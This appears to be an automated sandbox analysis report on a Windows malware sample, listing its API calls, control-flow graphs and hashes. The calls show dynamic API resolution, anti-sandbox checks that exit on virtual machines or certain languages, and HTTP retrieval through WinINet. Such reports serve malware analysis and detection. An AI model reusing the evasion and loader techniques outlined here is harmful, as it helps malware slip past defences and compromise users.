26945->26946 26947 4f1699 26946->26947 26948 4f1691 lstrcpy 26946->26948 26947->26632 26948->26947 26950 5171e6 26949->26950 26951 512860 26950->26951 26952 5171fc lstrcpy 26950->26952 26951->25775 26952->26951 26954 4f4bd0 26953->26954 26954->26954 26955 4f4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 26954->26955 26956 4f4c41 26955->26956 26956->26740 26958 513e83 26957->26958 26959 513e9f lstrcpy 26958->26959 26960 513eab 26958->26960 26959->26960 26961 513ed5 GetSystemTime 26960->26961 26962 513ecd lstrcpy 26960->26962 26963 513ef3 26961->26963 26962->26961 26963->26759 26965 51732d 26964->26965 26966 4f519b 26965->26966 26967 51733d lstrcpy lstrcat 26965->26967 26968 517280 26966->26968 26967->26966 26970 51728c 26968->26970 26969 5172b4 26969->26815 26970->26969 26971 5172ac lstrcpy 26970->26971 26971->26969 26974 5172dc 26972->26974 26973 4f51b7 26973->26818 26974->26973 26975 5172ed lstrcpy lstrcat 26974->26975 26975->26973 27006 5131f0 GetSystemInfo wsprintfA 26981 4f5869 57 API calls 26982 504c77 295 API calls 27013 50f2f8 93 API calls 26990 50e0f9 140 API calls 27017 506b79 138 API calls 27002 512d60 11 API calls 27018 512b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 26984 4f8c79 strcpy_s 27019 4f1b64 162 API calls 27033 4fbbf9 90 API calls 27008 501269 408 API calls 27021 519711 128 API calls __setmbcp 26985 512c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27003 514e35 8 API calls 27022 4fb309 98 API calls 26986 518819 free free free _raise 26991 502499 290 API calls 27034 508615 47 API calls 27023 4f7702 free ctype 26993 51749e 5 API calls ctype 26994 512880 10 API calls 26995 514480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 26996 513480 6 API calls 27014 513280 7 API calls 27035 4fdb99 672 API calls 26997 508c88 16 API calls 27004 513130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27036 50abb2 120 API calls 27010 4f8e20 strcpy_s free std::exception::exception 26998 5130a0 GetSystemPowerStatus 27007 5129a0 GetCurrentProcess IsWow64Process 27011 4ff639 144 API calls 27015 4f16b9 200 API calls 27027 4fbf39 177 API calls 27028 504b29 303 API calls 27037 5023a9 298 API calls

                        Executed Functions

                        Function 004F4C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F4C7F
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F4CD2
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F4D05
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F4D35
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F4D73
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F4DA6
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004F4DB6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$InternetOpen
                        • String ID: "$------
                        • API String ID: 2041821634-2370822465
                        • Opcode ID: 86d6c8b98e81aa257cb9fb8af1d2c655b65bcc32d20c138cf547b23ee20a3769
                        • Instruction ID: b2271363f88f0ad75d39df165a291ae59f429dd64bdaf17853770d555f7835ef
                        • Opcode Fuzzy Hash: 86d6c8b98e81aa257cb9fb8af1d2c655b65bcc32d20c138cf547b23ee20a3769
                        • Instruction Fuzzy Hash: 92528231A0121E9BDB21EFA5DC49BBF7BB9AF44304F054029FA05E7251DB78DD428B98
                        Function 00516390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2125 516390-5163bd GetPEB 2126 5165c3-516623 LoadLibraryA * 5 2125->2126 2127 5163c3-5165be call 5162f0 GetProcAddress * 20 2125->2127 2129 516625-516633 GetProcAddress 2126->2129 2130 516638-51663f 2126->2130 2127->2126 2129->2130 2132 516641-516667 GetProcAddress * 2 2130->2132 2133 51666c-516673 2130->2133 2132->2133 2134 516675-516683 GetProcAddress 2133->2134 2135 516688-51668f 2133->2135 2134->2135 2137 516691-51669f GetProcAddress 2135->2137 2138 5166a4-5166ab 2135->2138 2137->2138 2139 5166d7-5166da 2138->2139 2140 5166ad-5166d2 GetProcAddress * 2 2138->2140 2140->2139
                        APIs
                        • GetProcAddress.KERNEL32(75550000,01030708), ref: 005163E9
                        • GetProcAddress.KERNEL32(75550000,01030690), ref: 00516402
                        • GetProcAddress.KERNEL32(75550000,01030840), ref: 0051641A
                        • GetProcAddress.KERNEL32(75550000,01030660), ref: 00516432
                        • GetProcAddress.KERNEL32(75550000,01038810), ref: 0051644B
                        • GetProcAddress.KERNEL32(75550000,01026580), ref: 00516463
                        • GetProcAddress.KERNEL32(75550000,01026420), ref: 0051647B
                        • GetProcAddress.KERNEL32(75550000,01030558), ref: 00516494
                        • GetProcAddress.KERNEL32(75550000,01030570), ref: 005164AC
                        • GetProcAddress.KERNEL32(75550000,01030588), ref: 005164C4
                        • GetProcAddress.KERNEL32(75550000,010305B8), ref: 005164DD
                        • GetProcAddress.KERNEL32(75550000,01026280), ref: 005164F5
                        • GetProcAddress.KERNEL32(75550000,010305E8), ref: 0051650D
                        • GetProcAddress.KERNEL32(75550000,01030618), ref: 00516526
                        • GetProcAddress.KERNEL32(75550000,010264A0), ref: 0051653E
                        • GetProcAddress.KERNEL32(75550000,01030630), ref: 00516556
                        • GetProcAddress.KERNEL32(75550000,01030858), ref: 0051656F
                        • GetProcAddress.KERNEL32(75550000,010264C0), ref: 00516587
                        • GetProcAddress.KERNEL32(75550000,01030870), ref: 0051659F
                        • GetProcAddress.KERNEL32(75550000,010264E0), ref: 005165B8
                        • LoadLibraryA.KERNEL32(01030918,?,?,?,00511C03), ref: 005165C9
                        • LoadLibraryA.KERNEL32(01030888,?,?,?,00511C03), ref: 005165DB
                        • LoadLibraryA.KERNEL32(010308B8,?,?,?,00511C03), ref: 005165ED
                        • LoadLibraryA.KERNEL32(010308A0,?,?,?,00511C03), ref: 005165FE
                        • LoadLibraryA.KERNEL32(010308D0,?,?,?,00511C03), ref: 00516610
                        • GetProcAddress.KERNEL32(75670000,010308E8), ref: 0051662D
                        • GetProcAddress.KERNEL32(75750000,01030900), ref: 00516649
                        • GetProcAddress.KERNEL32(75750000,01038E50), ref: 00516661
                        • GetProcAddress.KERNEL32(76BE0000,01038C40), ref: 0051667D
                        • GetProcAddress.KERNEL32(759D0000,01026480), ref: 00516699
                        • GetProcAddress.KERNEL32(773F0000,01038900), ref: 005166B5
                        • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 005166CC
                        Strings
                        • NtQueryInformationProcess, xrefs: 005166C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: cb17645e38ebf906b287cbfb2e50d6439085d373b62de1ca53052657e1e5e1bb
                        • Instruction ID: 765376233dabe90bb4537a5af6250b54a254b97b523f3dbb81ef0ccfc0e375a4
                        • Opcode Fuzzy Hash: cb17645e38ebf906b287cbfb2e50d6439085d373b62de1ca53052657e1e5e1bb
                        • Instruction Fuzzy Hash: 8CA196B491224ADFD7B4DF64ED48E2637B9F748200B08C519EA55D3364EB3DA802CB69
                        Function 00511BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2141 511bf0-511c0b call 4f2a90 call 516390 2146 511c1a-511c27 call 4f2930 2141->2146 2147 511c0d 2141->2147 2151 511c35-511c63 2146->2151 2152 511c29-511c2f lstrcpy 2146->2152 2149 511c10-511c18 2147->2149 2149->2146 2149->2149 2156 511c65-511c67 ExitProcess 2151->2156 2157 511c6d-511c7b GetSystemInfo 2151->2157 2152->2151 2158 511c85-511ca0 call 4f1030 call 4f10c0 GetUserDefaultLangID 2157->2158 2159 511c7d-511c7f ExitProcess 2157->2159 2164 511ca2-511ca9 2158->2164 2165 511cb8-511cca call 512ad0 call 513e10 2158->2165 2164->2165 2166 511cb0-511cb2 ExitProcess 2164->2166 2171 511ce7-511d06 lstrlen call 4f2930 2165->2171 2172 511ccc-511cde call 512a40 call 513e10 2165->2172 2177 511d23-511d40 lstrlen call 4f2930 2171->2177 2178 511d08-511d0d 2171->2178 2172->2171 2185 511ce0-511ce1 ExitProcess 2172->2185 2186 511d42-511d44 2177->2186 2187 511d5a-511d7b call 512ad0 lstrlen call 4f2930 2177->2187 2178->2177 2180 511d0f-511d11 2178->2180 2180->2177 2183 511d13-511d1d lstrcpy lstrcat 2180->2183 2183->2177 2186->2187 2188 511d46-511d54 lstrcpy lstrcat 2186->2188 2193 511d9a-511db4 lstrlen call 4f2930 2187->2193 2194 511d7d-511d7f 2187->2194 2188->2187 2199 511db6-511db8 2193->2199 2200 511dce-511deb call 512a40 lstrlen call 4f2930 2193->2200 2194->2193 2195 511d81-511d85 2194->2195 2195->2193 2197 511d87-511d94 lstrcpy lstrcat 2195->2197 2197->2193 2199->2200 2201 511dba-511dc8 lstrcpy lstrcat 2199->2201 2206 511e0a-511e0f 2200->2206 2207 511ded-511def 2200->2207 2201->2200 2208 511e11 call 4f2a20 2206->2208 2209 511e16-511e22 call 4f2930 2206->2209 2207->2206 2210 511df1-511df5 2207->2210 2208->2209 2215 511e30-511e66 call 4f2a20 * 5 OpenEventA 2209->2215 2216 511e24-511e26 2209->2216 2210->2206 2213 511df7-511e04 lstrcpy lstrcat 2210->2213 2213->2206 2228 511e68-511e8a CloseHandle Sleep OpenEventA 2215->2228 2229 511e8c-511ea0 CreateEventA call 511b20 call 50ffd0 2215->2229 2216->2215 2217 511e28-511e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 511ea5-511eae CloseHandle ExitProcess 2229->2233
                        APIs
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030708), ref: 005163E9
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030690), ref: 00516402
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030840), ref: 0051641A
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030660), ref: 00516432
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01038810), ref: 0051644B
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01026580), ref: 00516463
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01026420), ref: 0051647B
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030558), ref: 00516494
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030570), ref: 005164AC
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01030588), ref: 005164C4
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,010305B8), ref: 005164DD
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,01026280), ref: 005164F5
                          • Part of subcall function 00516390: GetProcAddress.KERNEL32(75550000,010305E8), ref: 0051650D
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00511C2F
                        • ExitProcess.KERNEL32 ref: 00511C67
                        • GetSystemInfo.KERNEL32(?), ref: 00511C71
                        • ExitProcess.KERNEL32 ref: 00511C7F
                          • Part of subcall function 004F1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004F1046
                          • Part of subcall function 004F1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 004F104D
                          • Part of subcall function 004F1030: ExitProcess.KERNEL32 ref: 004F1058
                          • Part of subcall function 004F10C0: GlobalMemoryStatusEx.KERNEL32 ref: 004F10EA
                          • Part of subcall function 004F10C0: ExitProcess.KERNEL32 ref: 004F1114
                        • GetUserDefaultLangID.KERNEL32 ref: 00511C8F
                        • ExitProcess.KERNEL32 ref: 00511CB2
                        • ExitProcess.KERNEL32 ref: 00511CE1
                        • lstrlen.KERNEL32(01038820), ref: 00511CEE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00511D15
                        • lstrcat.KERNEL32(00000000,01038820), ref: 00511D1D
                        • lstrlen.KERNEL32(00524B98), ref: 00511D28
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511D48
                        • lstrcat.KERNEL32(00000000,00524B98), ref: 00511D54
                        • lstrlen.KERNEL32(00000000), ref: 00511D63
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511D89
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00511D94
                        • lstrlen.KERNEL32(00524B98), ref: 00511D9F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511DBC
                        • lstrcat.KERNEL32(00000000,00524B98), ref: 00511DC8
                        • lstrlen.KERNEL32(00000000), ref: 00511DD7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511DF9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00511E04
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                        • String ID:
                        • API String ID: 3366406952-0
                        • Opcode ID: fabe6fbb2ed9b79a78032003cb9140563b5acc01a4d798f03e3992cf2108d01f
                        • Instruction ID: b50febbd53b5f32ef8d723f77d323a44f8181ead5f2df1d9fb8e8f1aea3f93c4
                        • Opcode Fuzzy Hash: fabe6fbb2ed9b79a78032003cb9140563b5acc01a4d798f03e3992cf2108d01f
                        • Instruction Fuzzy Hash: 0A71B23160161A9BEB30ABB1DD4DBAE3F79BF40705F088054F706961A1DF789C428B6D
                        Function 004F6C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2234 4f6c40-4f6c64 call 4f2930 2237 4f6c66-4f6c6b 2234->2237 2238 4f6c75-4f6c97 call 4f4bc0 2234->2238 2237->2238 2239 4f6c6d-4f6c6f lstrcpy 2237->2239 2242 4f6caa-4f6cba call 4f2930 2238->2242 2243 4f6c99 2238->2243 2239->2238 2247 4f6cbc-4f6cc2 lstrcpy 2242->2247 2248 4f6cc8-4f6cf5 InternetOpenA StrCmpCA 2242->2248 2244 4f6ca0-4f6ca8 2243->2244 2244->2242 2244->2244 2247->2248 2249 4f6cfa-4f6cfc 2248->2249 2250 4f6cf7 2248->2250 2251 4f6ea8-4f6ebb call 4f2930 2249->2251 2252 4f6d02-4f6d22 InternetConnectA 2249->2252 2250->2249 2261 4f6ebd-4f6ebf 2251->2261 2262 4f6ec9-4f6ee0 call 4f2a20 * 2 2251->2262 2253 4f6d28-4f6d5d HttpOpenRequestA 2252->2253 2254 4f6ea1-4f6ea2 InternetCloseHandle 2252->2254 2256 4f6e94-4f6e9e InternetCloseHandle 2253->2256 2257 4f6d63-4f6d65 2253->2257 2254->2251 2256->2254 2259 4f6d7d-4f6dad HttpSendRequestA HttpQueryInfoA 2257->2259 2260 4f6d67-4f6d77 InternetSetOptionA 2257->2260 2263 4f6daf-4f6dd3 call 5171e0 call 4f2a20 * 2 2259->2263 2264 4f6dd4-4f6de4 call 513d90 2259->2264 2260->2259 2261->2262 2265 4f6ec1-4f6ec3 lstrcpy 2261->2265 2264->2263 2273 4f6de6-4f6de8 2264->2273 2265->2262 2276 4f6dee-4f6e07 InternetReadFile 2273->2276 2277 4f6e8d-4f6e8e InternetCloseHandle 2273->2277 2276->2277 2279 4f6e0d 2276->2279 2277->2256 2281 4f6e10-4f6e15 2279->2281 2281->2277 2283 4f6e17-4f6e3d call 517310 2281->2283 2286 4f6e3f call 4f2a20 2283->2286 2287 4f6e44-4f6e51 call 4f2930 2283->2287 2286->2287 2291 4f6e53-4f6e57 2287->2291 2292 4f6e61-4f6e8b call 4f2a20 InternetReadFile 2287->2292 2291->2292 2294 4f6e59-4f6e5b lstrcpy 2291->2294 2292->2277 2292->2281 2294->2292
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F6C6F
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F6CC2
                        • InternetOpenA.WININET(0051CFEC,00000001,00000000,00000000,00000000), ref: 004F6CD5
                        • StrCmpCA.SHLWAPI(?,0103E358), ref: 004F6CED
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004F6D15
                        • HttpOpenRequestA.WININET(00000000,GET,?,0103DB28,00000000,00000000,-00400100,00000000), ref: 004F6D50
                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004F6D77
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004F6D86
                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004F6DA5
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004F6DFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F6E5B
                        • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 004F6E7D
                        • InternetCloseHandle.WININET(00000000), ref: 004F6E8E
                        • InternetCloseHandle.WININET(?), ref: 004F6E98
                        • InternetCloseHandle.WININET(00000000), ref: 004F6EA2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F6EC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                        • String ID: ERROR$GET
                        • API String ID: 3687753495-3591763792
                        • Opcode ID: e6bba5d555b37ebf01f42f736b64c75993f05588dcd2d353802d95e5f4a686b8
                        • Instruction ID: b41676892ea4f59a0636b6ae05b96c64ccf8e91380d8b60abd306da1832cbc9f
                        • Opcode Fuzzy Hash: e6bba5d555b37ebf01f42f736b64c75993f05588dcd2d353802d95e5f4a686b8
                        • Instruction Fuzzy Hash: C481A472A41219ABEB20DFA5DC45FBF77B8EF44700F054119FA05E7280DB78AD458B98
                        Function 004F4A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2850 4f4a60-4f4afc RtlAllocateHeap 2867 4f4afe-4f4b03 2850->2867 2868 4f4b7a-4f4bbe VirtualProtect 2850->2868 2869 4f4b06-4f4b78 2867->2869 2869->2868
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F4AA3
                        • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 004F4BB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-3329630956
                        • Opcode ID: a10cc72b944fb0d04bb1dc08a0b5b5ee41f74d2326ceef86295535e3f0d62aa1
                        • Instruction ID: 505ddd7528df75e50f3810ae700766bb93114f23a4974a5aa89f7e378da30dd3
                        • Opcode Fuzzy Hash: a10cc72b944fb0d04bb1dc08a0b5b5ee41f74d2326ceef86295535e3f0d62aa1
                        • Instruction Fuzzy Hash: 0D31CE29B8033D769620EBEF6C4BF5F6E55FFC6BA0B028057B508571C1C9A25584CEE2
                        Function 00512A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00512A6F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00512A76
                        • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00512A8A
                        Memory Dump Source
